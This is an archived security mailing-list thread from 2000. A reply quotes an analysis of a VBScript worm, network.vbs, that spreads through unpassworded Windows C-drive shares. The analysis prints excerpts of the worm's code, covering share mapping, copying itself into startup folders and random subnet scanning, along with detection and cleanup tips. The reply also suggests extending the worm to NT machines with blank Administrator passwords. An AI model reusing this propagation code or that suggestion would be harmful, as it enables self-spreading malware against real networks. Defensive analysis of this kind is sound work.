Security Incidents mailing list archives
Re: Lame Windows Worm
From: sozni () USA NET (.sozni)
Date: Mon, 28 Feb 2000 09:03:56 MST
I'd say this script isn't so lame if it managed to install itself onto your friend's startup group. In fact, the brilliant thing about this little script is that it demonstrates that one doesn't have to know much about networks or even programming to create their own internet worm. It is funny to me that you so harshly criticize the script and yet you say that a precondition is that one must have their entire C drive shared without a password! And the worst thing about this whole scenario is that this "lame" little script will probably very easily replicate itself across the millions of shared and unpassworded C drives out there. What I would do to this script is add in a bit of code that also looks for NT systems with blank Administrator passwords, probably doubling the ground the worm covers. .sozni ----- Original Message ----- From: "Chris Brenton" <cbrenton () sover net> To: <INCIDENTS () SECURITYFOCUS COM> Sent: Saturday, February 26, 2000 9:23 PM Subject: Lame Windows Worm
Greetings all, I had a friend running WinProxy on a Windows 98 machine run across a file named network.vbs in their startup group. I ran it past the Dartmouth collage security institute and this is what they came up with. The attack is somewhat lame but has the potential to waste quite a bit of bandwidth. Since it was found in the wild, its obviously making the rounds. The script appears to be a direct rip off of the c:\windows\samples\wsh\network.vbs script included with Windows 98. Guess the purp could not even be bothered to write their own code. ;) Effected Systems: Windows 95 and Windows 98 Method of infection: File copy via file shares Special conditions required: Drive "C" must be shared read/write with no password How to tell if you are infected: Look for network.vbs in the startup group How to clean it: Remove network.vbs from the startup group ;) Code analysis: Interesting bits pasted below with added commentary ------ do do while driveconnected = "0" checkaddress() shareformat() wshnetwork.mapnetworkdrive "j:", sharename enumdrives() loop copyfiles() disconnectdrive() loop The main purpose of the script can be seen here. Its designed to create share mappings with other Windows systems and then copy over files. ------ function checkfile() If (fso1.fileexists("c:\network.log")) then fso1.deletefile("c:\network.log") createlogfile() The script creates a log file. This gives a good clue as to infection. If you have this file on your system, you may be infected. ------ fso.copyfile "c:\network.vbs", "j:\" fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\" fso.copyfile "c:\network.vbs", "j:\windows\" fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\" fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\" fso.copyfile "c:\network.vbs", "j:\wind95\" Geesh, how many copies of the file do you need to infect the target system? Lines 2 and 6 would be sufficient. Speaks of an amateur that didn't really know what they where doing so they just kept adding copy jobs till it worked consistently. ;) A couple of points worth noting: The entire "C" drive must be shared to get infected This script is targeted at Windows 95 & 98 systems You can see if you are infected by looking for network.vbs in startup group ------ function checkaddress() octd = octd + 1 if octd = "255" then randaddress() end function function shareformat() sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C" end function Here's where things start to get nasty. The system figures out who to infect next by enumerating the local address and walking the subnet. This should trigger any IDS system tuned in to hosts performing a service scan for NetBIOS/IP. ------ function randum() rand = int((254 * rnd) + 1) end function function randaddress() if count < 50 then octa=Int((16) * Rnd + 199) count=count + 1 else Guess its not enough to infect the local subnet, this script then goes out and probes random hosts in the 199.x.x.x to 215.x.x.x subnet ranges. This is done 50 times before moving on to the section of the script below. ------ randum() octa= rand end if randum() octb=rand randum() octc=rand octd="1" myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0") end function Start checking random subnets and log them to the c:\network.log file. One interesting point here is the script specifically targets x.x.x.1 addresses. Again speaks to an amateur as a .1 address will typically be occupied by a router, not a Windows machine. So this script is nothing severe but could be a nasty waste of bandwidth in the wrong environment. This script could be real pain on a cable or DSL environment. It could also be trouble in a corporate environment on a Monday morning when everyone powers back up for the first time. HTH, Chris
____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- Lame Windows Worm Chris Brenton (Feb 26)
- <Possible follow-ups>
- Re: Lame Windows Worm .sozni (Feb 28)
- Re: Lame Windows Worm Chris Brenton (Feb 28)